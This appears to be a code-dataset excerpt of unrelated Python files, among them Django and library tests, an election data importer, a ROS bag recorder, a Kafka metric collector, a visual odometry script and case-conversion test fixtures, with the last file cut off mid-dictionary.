content
stringlengths 5
1.05M
|
|---|
import pytest
from django.http import HttpResponse
from apirouter import APIRouter
from apirouter.exceptions import APIException
pytestmark = [pytest.mark.urls(__name__)]
def exception_handler(request, exc):
return HttpResponse(str(exc), status=400)
router = APIRouter(exception_handler=exception_handler)
@router.route("/string")
def handle_string(request):
return "OK"
@router.route("/dict")
def handle_dict(request):
return {"success": True}
@router.route("/list")
def handle_list(request):
return [1, 2, 3, 4, 5]
@router.route("/error")
def handle_error(request):
raise APIException(status_code=400, detail="Error")
urlpatterns = router.urls
def test_handle_string(client):
response = client.get("/string")
assert response.status_code == 200
assert response.json() == "OK"
def test_handle_dict(client):
response = client.get("/dict")
assert response.status_code == 200
assert response.json() == {"success": True}
def test_handle_list(client):
response = client.get("/list")
assert response.status_code == 200
assert response.json() == [1, 2, 3, 4, 5]
def test_handle_error(client):
response = client.get("/error")
assert response.status_code == 400
assert response.content == b"Error"
|
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "HAA"
addresses_name = "2021-03-25T12:55:41.884654/Democracy_Club__06May2021.tsv"
stations_name = "2021-03-25T12:55:41.884654/Democracy_Club__06May2021.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"100062456253", # 37 LONDON ROAD, COWPLAIN, WATERLOOVILLE
]:
return None
if record.addressline6 in [
"PO9 2DT",
"PO9 3EZ",
"PO8 8BB",
"PO10 7NH",
"PO10 7HN",
"PO8 9UB",
]:
return None
return super().address_record_to_dict(record)
|
from intent_parser.protocols.lab_protocol_accessor import LabProtocolAccessor
from intent_parser.protocols.labs.aquarium_opil_accessor import AquariumOpilAccessor
from intent_parser.protocols.labs.strateos_accessor import StrateosAccessor
from intent_parser.protocols.templates.experimental_request_template import ExperimentalRequest
from intent_parser.table.intent_parser_table_factory import IntentParserTableFactory
from intent_parser.table.measurement_table import MeasurementTable
import intent_parser.constants.intent_parser_constants as ip_constants
import unittest
class JellyFishProtocolOutputTest(unittest.TestCase):
def setUp(self):
aquarium_accessor = AquariumOpilAccessor()
strateos_accessor = StrateosAccessor()
lab_protocol_accessor = LabProtocolAccessor(strateos_accessor, aquarium_accessor)
self.opil_lab_template = lab_protocol_accessor.load_protocol_interface_from_lab('High-Throughput Culturing',
ip_constants.LAB_DUKE_HASE)
self.ip_table_factory = IntentParserTableFactory()
def test_size_of_load_experimental_request(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual(1, len(experimental_request.opil_experimental_requests))
def test_experimental_id_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('foo_id',
experimental_request.opil_experimental_requests[0].experiment_id)
def test_experimental_reference_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('IntentParserCopy_foo',
experimental_request.opil_experimental_requests[0].experiment_reference)
def test_experimental_reference_url_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('https://docs.google.com/document/d/foo',
experimental_request.opil_experimental_requests[0].experiment_reference_url)
def test_size_of_load_sampleset_from_protocol_interface(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_sample_template_from_protocol_interface()
self.assertEqual(1, len(experimental_request.opil_sample_sets))
def test_size_of_load_sampleset_template_from_protocol_interface(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_sample_template_from_protocol_interface()
self.assertIsNotNone(experimental_request.sample_template)
self.assertEqual('http://aquarium.bio/htc_design',
experimental_request.sample_template.identity)
@unittest.skip("reparenting with existing id")
def test_size_of_create_subcomponents_from_template(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
self.assertEqual(4, len(experimental_request.sample_template.features))
@unittest.skip("reparenting with existing id")
def test_subcomponent_names(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
expected_subcomponent_names = ['Antibiotic', 'Inducer', 'Media', 'Strain']
for feature in experimental_request.sample_template.features:
self.assertTrue(feature.name in expected_subcomponent_names)
@unittest.skip("reparenting with existing id")
def test_size_of_sample_sets(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
self.assertEqual(2, len(experimental_request.opil_sample_sets))
@unittest.skip("reparenting with existing id")
def test_for_original_sample_set_by_identity(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
actual_sample_set_identities = [sample.identity for sample in experimental_request.opil_sample_sets]
self.assertTrue('http://aquarium.bio/culture_conditions' in actual_sample_set_identities)
@unittest.skip("reparenting with existing id")
def test_size_of_add_variable_features_from_measurement_intents(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
experimental_request.add_variable_features_from_measurement_intents(measurement_table.get_intents())
self.assertEqual(2, len(experimental_request.opil_sample_sets))
sample_set1 = experimental_request.opil_sample_sets[0]
sample_set2 = experimental_request.opil_sample_sets[1]
self.assertEqual(3, len(sample_set1.variable_features))
self.assertEqual(3, len(sample_set2.variable_features))
def _create_dummy_measurement_table(self):
input_table = {'tableRows': [
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'measurement-type'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Strains'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Inducer'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Media'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Antibiotic'}}]}}]}
]},
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'FLOW'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'NOR00',
'textStyle': {'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/UWBF_6390/1'}}}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Sytox'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]}
]},
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'FLOW'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'NOR00',
'textStyle': {'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/UWBF_6390/1'}}}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Sytox'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]}
]}
]
}
ip_table = self.ip_table_factory.from_google_doc({'table': input_table,
'startIndex': 0,
'endIndex': 100})
return ip_table
def tearDown(self):
pass
if __name__ == "__main__":
unittest.main()
|
import matplotlib as mpl
mpl.use("Agg") # Must come after importing mpl, but before importing plt
import matplotlib.pyplot as plt
|
from typing import Callable
from rx3.core import Observable
def _skip_last(count: int) -> Callable[[Observable], Observable]:
def skip_last(source: Observable) -> Observable:
"""Bypasses a specified number of elements at the end of an
observable sequence.
This operator accumulates a queue with a length enough to store
the first `count` elements. As more elements are received,
elements are taken from the front of the queue and produced on
the result sequence. This causes elements to be delayed.
Args:
count: Number of elements to bypass at the end of the
source sequence.
Returns:
An observable sequence containing the source sequence
elements except for the bypassed ones at the end.
"""
def subscribe(observer, scheduler=None):
q = []
def on_next(value):
front = None
with source.lock:
q.append(value)
if len(q) > count:
front = q.pop(0)
if front is not None:
observer.on_next(front)
return source.subscribe_(on_next, observer.on_error, observer.on_completed, scheduler)
return Observable(subscribe)
return skip_last
|
import os
import timeit
import numpy as np
from collections import defaultdict
#from scikits.talkbox.features import mfcc
from python_speech_features import mfcc
from sklearn.metrics import precision_recall_curve, roc_curve
from sklearn.metrics import auc
from sklearn.cross_validation import ShuffleSplit
from sklearn.linear_model.logistic import LogisticRegression
from sklearn.metrics import confusion_matrix
from sklearn.externals import joblib
from utils1 import GENRE_DIR, GENRE_LIST
import scipy
import scipy.io.wavfile
# from utils import plot_roc, plot_confusion_matrix, GENRE_DIR, GENRE_LIST, TEST_DIR
# from ceps import read_ceps, create_ceps_test, read_ceps_test
from pydub import AudioSegment
genre_list = GENRE_LIST
clf = None
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Please run the classifier script first
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def create_fft(wavfile):
sample_rate, song_array = scipy.io.wavfile.read(wavfile)
fft_features = abs(scipy.fft(song_array[:30000]))
print(song_array)
base_fn, ext = os.path.splitext(wavfile)
data_fn = base_fn + ".fft"
np.save(data_fn, fft_features)
print data_fn
return data_fn
def create_ceps_test(fn):
"""
Creates the MFCC features from the test files,
saves them to disk, and returns the saved file name.
"""
sample_rate, X = scipy.io.wavfile.read(fn)
# X[X==0]=1
# np.nan_to_num(X)
ceps= mfcc(X)
bad_indices = np.where(np.isnan(ceps))
b=np.where(np.isinf(ceps))
ceps[bad_indices]=0
ceps[b]=0
base_fn, ext = os.path.splitext(fn)
data_fn = base_fn + ".ceps"
np.save(data_fn, ceps)
print "Written ", data_fn
return data_fn
def read_fft(test_file):
X = []
y = []
fft_features = np.load(test_file)
X.append(fft_features)
for label, genre in enumerate(genre_list):
y.append(label)
# for label, genre in enumerate(genre_list):
# # create UNIX pathnames to id FFT-files.
# genre_dir = os.path.join(base_dir, genre, "*.fft.npy")
# # get path names that math genre-dir
# file_list = glob.glob(genre_dir)
# for file in file_list:
# fft_features = np.load(file)
# X.append(fft_features)
# y.append(label)
# print(X)
# print(y)
return np.array(X), np.array(y)
def read_ceps_test(test_file):
"""
Reads the MFCC features from disk and
returns them in a numpy array.
"""
X = []
y = []
ceps = np.load(test_file)
num_ceps = len(ceps)
X.append(np.mean(ceps[int(num_ceps / 10):int(num_ceps * 9 / 10)], axis=0))
for label, genre in enumerate(genre_list):
y.append(label)
return np.array(X), np.array(y)
def test_model_on_single_file(file_path):
clf = joblib.load('saved_models/model_mfcc_knn.pkl')
#clf = joblib.load('saved_models/model_mfcc_knn.pkl')
#clf = joblib.load('saved_models/model_fft_log.pkl')
X, y = read_ceps_test(create_ceps_test(test_file)+".npy")
#X,y=read_fft(create_fft(test_file)+".npy")
#nsamples, nx, ny = X.shape
# X = X.reshape((nsamples,nx*ny))
# x=X[:30000]
# print(x.shape)
probs = clf.predict_proba(X)
print "\t".join(str(x) for x in genre_list)
print "\t".join(str("%.3f" % x) for x in probs[0])
probs=probs[0]
max_prob = max(probs)
for i,j in enumerate(probs):
if probs[i] == max_prob:
max_prob_index=i
print max_prob_index
predicted_genre = genre_list[max_prob_index]
print "\n\npredicted genre = ",predicted_genre
dictionary = dict(zip(probs, genre_list))
#print dictionary
for values in sorted(dictionary.iteritems(),reverse=True):
print values
return predicted_genre
#probs.sort(reverse=True)
if __name__ == "__main__":
global traverse
for subdir, dirs, files in os.walk(GENRE_DIR):
traverse = list(set(dirs).intersection(set(GENRE_LIST)))
break
#test_file = "/home/dhruvesh/Desktop/dsp-final/genres/blues/blues.00000.wav"
test_file = "/home/dhruvesh/Desktop/dsp-final/country.wav"
# nsamples, nx, ny = test_file.shape
# test_file = test_file.reshape((nsamples,nx*ny))
# should predict genre as "ROCK"
predicted_genre = test_model_on_single_file(test_file)
|
#!/usr/bin/env python2
from __future__ import division, print_function, absolute_import
# Import ROS libraries
import roslib
import rospy
import rosbag
import numpy as np
import time
# Import class that computes the desired positions
from tf.transformations import euler_from_quaternion
from geometry_msgs.msg import TransformStamped, Twist
from sensor_msgs.msg import Image
from nav_msgs.msg import Odometry
from std_msgs.msg._Empty import Empty
class ROSBagNode(object):
def __init__(self):
"""Initialize the ROSControllerNode class"""
# subscriber
self.drone_pos_topic = '/gazebo_ground_truth_UAV0'
self.drone_pos_msg = Odometry()
self.payload_pos_topic = '/gazebo_ground_truth_payload'
self.payload_pos_msg = Odometry()
self.payload_est_topic = '/gazebo_estimate_payload_pose'
self.payload_est_msg = TransformStamped()
self.payload_est_rel_topic = '/gazebo_estimate_payload_pose_camera'
self.payload_est_rel_msg = TransformStamped()
self.image_topic = '/iris_0/bottom/image_raw'
self.image_msg = Image()
self.sub_drone = rospy.Subscriber(self.drone_pos_topic, Odometry, self.get_drone_pos)
self.sub_payload = rospy.Subscriber(self.payload_pos_topic, Odometry, self.get_payload_pos)
self.sub_payload_est = rospy.Subscriber(self.payload_est_topic, TransformStamped, self.get_payload_est)
self.sub_payload_est_rel = rospy.Subscriber(self.payload_est_rel_topic, TransformStamped, self.get_payload_est_rel)
self.sub_img = rospy.Subscriber(self.image_topic, Image, self.get_image)
# run the rosbag writer at 20 Hz
self.data_loop_frequency = 20.
# run the rosbag writer at the given frequency
self.rate = rospy.Rate(self.data_loop_frequency)
self.time_stamp = 0
self.bag_loc = '/home/consibic/Documents/rosbag_orig_controller/single_drone_payload_{0}.bag'.format(str(time.time()))
self.bag = rosbag.Bag(self.bag_loc, 'w')
def get_drone_pos(self, msg):
self.drone_pos_msg = msg
def get_payload_pos(self, msg):
self.payload_pos_msg = msg
def get_payload_est(self, msg):
self.payload_est_msg = msg
def get_payload_est_rel(self, msg):
self.payload_est_rel_msg = msg
def get_image(self, msg):
self.image_msg = msg
if __name__ == '__main__':
rospy.init_node("ros_bag", disable_signals=True)
drone = ROSBagNode()
counter = 0
try:
while not rospy.is_shutdown():
drone.bag.write(drone.drone_pos_topic, drone.drone_pos_msg)
drone.bag.write(drone.payload_pos_topic, drone.payload_pos_msg)
drone.bag.write(drone.payload_est_topic, drone.payload_est_msg)
drone.bag.write(drone.payload_est_rel_topic, drone.payload_est_rel_msg)
# if counter == 100:
# drone.bag.write(drone.image_topic, drone.image_msg)
# counter = 0
# else:
# counter += 1
drone.rate.sleep()
finally:
drone.bag.close()
print('end')
|
import numpy as np
from unittest import mock
from unittest.mock import MagicMock, Mock, create_autospec
from napari_allencell_segmenter.view.workflow_steps_view import (
WorkflowStepsView,
IWorkflowStepsController,
SegmenterModel,
)
from aicssegmentation.workflow import WorkflowEngine
class TestWorkflowStepsView:
def setup_method(self):
model = SegmenterModel()
model.active_workflow = WorkflowEngine().get_executable_workflow("sec61b", np.ones((1, 1, 1)))
self._mock_controller: MagicMock = create_autospec(IWorkflowStepsController)
self._view = WorkflowStepsView(self._mock_controller)
self._view.load(model)
def test_show_workflow_diagram(self):
assert not self._view.window_workflow_diagram.isVisible()
self._view.btn_workflow_info.clicked.emit(False)
assert self._view.window_workflow_diagram.isVisible()
def test_run_all(self):
self._view.btn_run_all.clicked.emit(False)
self._mock_controller.run_all.assert_called_once()
def test_close_workflow_keep_layers(self):
self._view.btn_close_keep.clicked.emit(False)
self._mock_controller.close_workflow.assert_called_once()
@mock.patch("napari_allencell_segmenter.view.workflow_steps_view.QFileDialog.getSaveFileName")
def test_save_workflow(self, mock_dialog_save: Mock):
mock_dialog_save.return_value = ("/path/to/file.json", "filters")
self._view.btn_save_workflow.clicked.emit(False)
self._mock_controller.save_workflow.assert_called_once()
|
import uuid
import pytest
from citrine.informatics.workflows import PredictorEvaluationWorkflow
from citrine.resources.predictor_evaluation_workflow import PredictorEvaluationWorkflowCollection
from tests.utils.session import FakeSession, FakeCall
@pytest.fixture
def session() -> FakeSession:
return FakeSession()
@pytest.fixture
def collection(session) -> PredictorEvaluationWorkflowCollection:
return PredictorEvaluationWorkflowCollection(
project_id=uuid.uuid4(),
session=session,
)
@pytest.fixture
def workflow(collection: PredictorEvaluationWorkflowCollection,
predictor_evaluation_workflow_dict) -> PredictorEvaluationWorkflow:
return collection.build(predictor_evaluation_workflow_dict)
def test_basic_methods(workflow, collection):
assert "PredictorEvaluationWorkflow" in str(workflow)
assert workflow.evaluators[0].name == "Example evaluator"
def test_archive(workflow, collection):
collection.archive(workflow.uid)
expected_path = '/projects/{}/predictor-evaluation-workflows/archive'.format(collection.project_id)
assert collection.session.last_call == FakeCall(method='PUT', path=expected_path,
json={"module_uid": str(workflow.uid)})
def test_restore(workflow, collection):
collection.restore(workflow.uid)
expected_path = '/projects/{}/predictor-evaluation-workflows/restore'.format(collection.project_id)
assert collection.session.last_call == FakeCall(method='PUT', path=expected_path,
json={"module_uid": str(workflow.uid)})
def test_delete(collection):
with pytest.raises(NotImplementedError):
collection.delete(uuid.uuid4())
def test_create_default(predictor_evaluation_workflow_dict: dict,
workflow: PredictorEvaluationWorkflow):
session = FakeSession()
session.set_response(predictor_evaluation_workflow_dict)
collection = PredictorEvaluationWorkflowCollection(
project_id=uuid.uuid4(),
session=session
)
default_workflow = collection.create_default(predictor_id=uuid.uuid4())
assert default_workflow.dump() == workflow.dump()
|
"""
.. warning:: `logging` package has been renamed to `loggers` since v0.7.0 and will be removed in v0.9.0
"""
from pytorch_lightning.loggers.comet import CometLogger # noqa: F403
|
import json
import logging
from django.core.management import BaseCommand
from runner.config import KAFKA_TRANS_TOPIC, METRICS_WHITELIST, KAFKA_PREP_TOPIC
from runner.constants import VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS
from runner.utils.kafka import KafkaExporter, init_consumer_and_subscribe
logger = logging.getLogger('metric_collector')
def metric_collector():
"""Connects on Kafka Bus and collects metrics for active vTranscoders and spectators. """
# Initialize consumer and exporter
consumer = init_consumer_and_subscribe(topic=KAFKA_TRANS_TOPIC,
group_id_suffix='IMMERSIVE_MEDIA_PREPROCESSING')
kafka_exporter = KafkaExporter()
# Metrics Dict
metrics_per_resource_id = {}
for msg in consumer:
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
except json.JSONDecodeError as jde:
logger.error(jde)
continue
# Check if VIM tag is the required
vim_tag = payload['mano']['vim']['tag']
if vim_tag not in [VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS]:
logger.debug('VIM tag was {}. Ignoring ...'.format(vim_tag))
continue
# Check if metric is in whitelist
if payload['metric']['name'] not in METRICS_WHITELIST:
logger.debug('Metric was {}. Ignoring ...'.format(payload['metric']['name']))
continue
# Get metric details
mano_vdu_id = payload['mano']['vdu']['id']
metric = payload['metric']
metric_name = metric['name']
metric_value = metric['value']
metric_timestamp = metric['timestamp']
# If the metrics refer to spectators
if vim_tag == VTRANSCODER_3D_SPECTATORS:
client_id = payload['spectator']['client_id']
group_id = payload['spectator']['group_id']
resource_id = (client_id, group_id, mano_vdu_id)
logger.debug('Received metric [{}] for resource [{}].'.format(metric_name, resource_id))
if resource_id in metrics_per_resource_id.keys():
if metrics_per_resource_id[resource_id][metric_name] is None:
metrics_per_resource_id[resource_id][metric_name] = metric_value
if None not in metrics_per_resource_id[resource_id].values():
payload.pop('metric')
payload['timestamp'] = metric_timestamp
payload['measurements'] = metrics_per_resource_id[resource_id]
logger.info('Collected measurements for resource [{}]: `{}`'
.format(resource_id, payload['measurements']))
kafka_exporter.publish_message(KAFKA_PREP_TOPIC, payload)
metrics_per_resource_id[resource_id] = dict.fromkeys(metrics_per_resource_id[resource_id], None)
else:
logger.debug('Resource [] has now been recorded.'.format(resource_id))
metrics_per_resource_id[resource_id] = {
'bitrate_aggr': None,
'bitrate_on': None,
'framerate_aggr': None,
'framerate_on': None,
'latency_aggr': None,
'working_fps': None,
'output_data_bytes': None,
'theoretic_load_percentage': None
}
metrics_per_resource_id[resource_id][metric_name] = metric_value
# If the metrics refer to vTranscoders
if vim_tag == VTRANSCODER_3D:
for resource in metrics_per_resource_id.keys():
if resource[-1] == mano_vdu_id:
logger.debug('Set metric [{}] for resource [{}].'.format(metric_name, resource))
metrics_per_resource_id[resource][metric_name] = metric_value
class Command(BaseCommand):
def handle(self, *args, **options):
metric_collector()
|
import cv2
import numpy as np
import random
import matplotlib.pyplot as plt
import os
from ReadCameraModel import ReadCameraModel
from UndistortImage import UndistortImage
import copy
from numpy.linalg import matrix_rank
import pandas as pd
l = []
frames = []
pathimage="/home/arjun/Desktop/VOM/Oxford_dataset/stereo/centre/"
pathmodel="/home/arjun/Desktop/VOM/Oxford_dataset/model/"
def cvfunctions(distort1, distort2, k):
kp1, des1 = sift.detectAndCompute(distort1, None)
kp2, des2 = sift.detectAndCompute(distort2, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
pointsmatched = []
pointsfrom1 = []
pointsfrom2 = []
for i, (s, p) in enumerate(matches):
if s.distance < 0.5 * p.distance:
pointsmatched.append(s)
pointsfrom2.append(kp2[s.trainIdx].pt)
pointsfrom1.append(kp1[s.queryIdx].pt)
pointsfrom1 = np.int32(pointsfrom1)
pointsfrom2 = np.int32(pointsfrom2)
F, mask = cv2.findFundamentalMat(pointsfrom1, pointsfrom2, cv2.FM_RANSAC)
pointsfrom1 = pointsfrom1[mask.ravel() == 1]
pointsfrom2 = pointsfrom2[mask.ravel() == 1]
E = k.T @ F @ k
retval, R, t, mask = cv2.recoverPose(E, pointsfrom1, pointsfrom2, k)
return R, t
def cameraMatrix(file):
frames1 = []
for frames in os.listdir(file):
frames1.append(frames)
fx, fy, cx, cy, G_camera_frames, LUT = ReadCameraModel(pathmodel)
K = np.array([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])
return K, LUT
def Homogenousmatrix(R, t):
h = np.column_stack((R, t))
a = np.array([0, 0, 0, 1])
h = np.vstack((h, a))
return h
sift = cv2.xfeatures2d.SIFT_create()
# pathimage="/home/arjun/Desktop/VOM/Oxford_dataset/stereo/centre/"
# pathmodel="/home/arjun/Desktop/VOM/Oxford_dataset/model/"
file = pathimage
k, LUT = cameraMatrix(pathimage)
for frames1 in os.listdir(file):
frames.append(frames1)
frames.sort()
homo1 = np.identity(4)
t1 = np.array([[0, 0, 0, 1]])
t1 = t1.T
for index in range(19, len(frames)-1):
print(frames[index], index)
img1 = cv2.imread(pathimage + str(frames[index]), 0)
colorimage1 = cv2.cvtColor(img1, cv2.COLOR_BayerGR2BGR)
undistortedimage1 = UndistortImage(colorimage1,LUT)
gray1 = cv2.cvtColor(undistortedimage1,cv2.COLOR_BGR2GRAY)
img2 = cv2.imread(pathimage+ str(frames[index + 1]), 0)
colorimage2 = cv2.cvtColor(img2, cv2.COLOR_BayerGR2BGR)
undistortedimage2 = UndistortImage(colorimage2,LUT)
gray2 = cv2.cvtColor(undistortedimage2,cv2.COLOR_BGR2GRAY)
gray1 = gray1[200:650, 0:1280]
gray2 = gray2[200:650, 0:1280]
R, T = cvfunctions(gray1, gray2, k)
homo2 = Homogenousmatrix(R, T)
homo1 = homo1 @ homo2
p1 = homo1 @ t1
plt.scatter(p1[0][0], -p1[2][0], color='r')
l.append([p1[0][0], -p1[2][0]])
df = pd.DataFrame(l, columns = ['X', 'Y'])
df.to_excel('ocvcoordinates.xlsx')
plt.savefig('ocv.png')
plt.show()
|
from unittest import TestCase
from parameterized import parameterized
import case_conversion
ACRONYMS = ["HTTP"]
ACRONYMS_UNICODE = ["HÉÉP"]
CASES = [
"camel",
"pascal",
"snake",
"dash",
"dash",
"const",
"const",
"dot",
]
CASES_PRESERVE = [
"separate_words",
"slash",
"backslash",
]
VALUES = {
"camel": "fooBarString",
"pascal": "FooBarString",
"snake": "foo_bar_string",
"dash": "foo-bar-string",
"const": "FOO_BAR_STRING",
"dot": "foo.bar.string",
"separate_words": "foo bar string",
"slash": "foo/bar/string",
"backslash": "foo\\bar\\string",
}
VALUES_UNICODE = {
"camel": "fóoBarString",
"pascal": "FóoBarString",
"snake": "fóo_bar_string",
"dash": "fóo-bar-string",
"const": "FÓO_BAR_STRING",
"dot": "fóo.bar.string",
"separate_words": "fóo bar string",
"slash": "fóo/bar/string",
"backslash": "fóo\\bar\\string",
}
VALUES_SINGLE = {
"camel": "foo",
"pascal": "Foo",
"snake": "foo",
"dash": "foo",
"const": "FOO",
"dot": "foo",
"separate_words": "foo",
"slash": "foo",
"backslash": "foo",
}
VALUES_SINGLE_UNICODE = {
"camel": "fóo",
"pascal": "Fóo",
"snake": "fóo",
"dash": "fóo",
"const": "FÓO",
"dot": "fóo",
"separate_words": "fóo",
"slash": "fóo",
"backslash": "fóo",
}
VALUES_ACRONYM = {
"camel": "fooHTTPBarString",
"pascal": "FooHTTPBarString",
"snake": "foo_http_bar_string",
"dash": "foo-http-bar-string",
"const": "FOO_HTTP_BAR_STRING",
"dot": "foo.http.bar.string",
"separate_words": "foo http bar string",
"slash": "foo/http/bar/string",
"backslash": "foo\\http\\bar\\string",
}
VALUES_ACRONYM_UNICODE = {
"camel": "fooHÉÉPBarString",
"pascal": "FooHÉÉPBarString",
"snake": "foo_héép_bar_string",
"dash": "foo-héép-bar-string",
"const": "FOO_HÉÉP_BAR_STRING",
"dot": "foo.héép.bar.string",
"separate_words": "foo héép bar string",
"slash": "foo/héép/bar/string",
"backslash": "foo\\héép\\bar\\string",
}
PRESERVE_VALUES = {
"separate_words": {
"camel": "foo Bar String",
"pascal": "Foo Bar String",
"const": "FOO BAR STRING",
"default": "foo bar string",
},
"slash": {
"camel": "foo/Bar/String",
"pascal": "Foo/Bar/String",
"const": "FOO/BAR/STRING",
"default": "foo/bar/string",
},
"backslash": {
"camel": "foo\\Bar\\String",
"pascal": "Foo\\Bar\\String",
"const": "FOO\\BAR\\STRING",
"default": "foo\\bar\\string",
},
}
PRESERVE_VALUES_UNICODE = {
"separate_words": {
"camel": "fóo Bar String",
"pascal": "Fóo Bar String",
"const": "FÓO BAR STRING",
"default": "fóo bar string",
},
"slash": {
"camel": "fóo/Bar/String",
"pascal": "Fóo/Bar/String",
"const": "FÓO/BAR/STRING",
"default": "fóo/bar/string",
},
"backslash": {
"camel": "fóo\\Bar\\String",
"pascal": "Fóo\\Bar\\String",
"const": "FÓO\\BAR\\STRING",
"default": "fóo\\bar\\string",
},
}
PRESERVE_VALUES_SINGLE = {
"separate_words": {
"camel": "foo",
"pascal": "Foo",
"const": "FOO",
"default": "foo",
},
"slash": {"camel": "foo", "pascal": "Foo", "const": "FOO", "default": "foo",},
"backslash": {"camel": "foo", "pascal": "Foo", "const": "FOO", "default": "foo",},
}
PRESERVE_VALUES_SINGLE_UNICODE = {
"separate_words": {
"camel": "fóo",
"pascal": "Fóo",
"const": "FÓO",
"default": "fóo",
},
"slash": {"camel": "fóo", "pascal": "Fóo", "const": "FÓO", "default": "fóo",},
"backslash": {"camel": "fóo", "pascal": "Fóo", "const": "FÓO", "default": "fóo",},
}
PRESERVE_VALUES_ACRONYM = {
"separate_words": {
"camel": "foo HTTP Bar String",
"pascal": "Foo HTTP Bar String",
"const": "FOO HTTP BAR STRING",
"default": "foo http bar string",
},
"slash": {
"camel": "foo/HTTP/Bar/String",
"pascal": "Foo/HTTP/Bar/String",
"const": "FOO/HTTP/BAR/STRING",
"default": "foo/http/bar/string",
},
"backslash": {
"camel": "foo\\HTTP\\Bar\\String",
"pascal": "Foo\\HTTP\\Bar\\String",
